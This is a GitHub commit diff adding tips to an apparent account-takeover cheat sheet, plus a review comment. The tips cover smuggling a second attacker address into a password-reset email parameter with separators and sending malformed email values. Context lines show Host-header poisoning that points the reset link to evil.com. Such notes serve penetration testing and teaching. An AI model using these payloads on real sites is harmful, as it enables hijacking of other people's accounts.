Account Takeover [2]

Add 3 tips
Muhammad Daffa 2020-09-03 21:04:19 +07:00 committed by GitHub
parent 4e7af26eb2
commit 35198d15d7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -21,4 +21,35 @@ Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with your evil.com
And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter
```
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```
5. No domain in value of the paramter
```
POST /reset
[...]
email=victim
```
6. No TLD in value of the paramter
```
POST /reset
[...]
email=victim@mail
```
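Review bot: The headings of items 5 and 6 spell "parameter" as "paramter", and tips 4 to 6 stop at the request body without saying what server behaviour counts as a finding, whereas the preceding tip closes with "And the victim will receive the reset link with evil.com". Suggest correcting the spelling and adding one sentence per tip that states the outcome to look for; for item 4 that would be whether the reset mail also reaches the second address, while for items 5 and 6 the hunk gives no hint of the expected result, so it needs to be spelled out. The three requests under item 4 differ only in the separator (`,`, `%20`, `|`), so naming those in the heading or collapsing them into one block with a list of separators would make the section easier to scan. A short remediation line would also serve readers fixing this: the reset endpoint should accept exactly one well-formed address, compare it to the stored account email, and reject any other value.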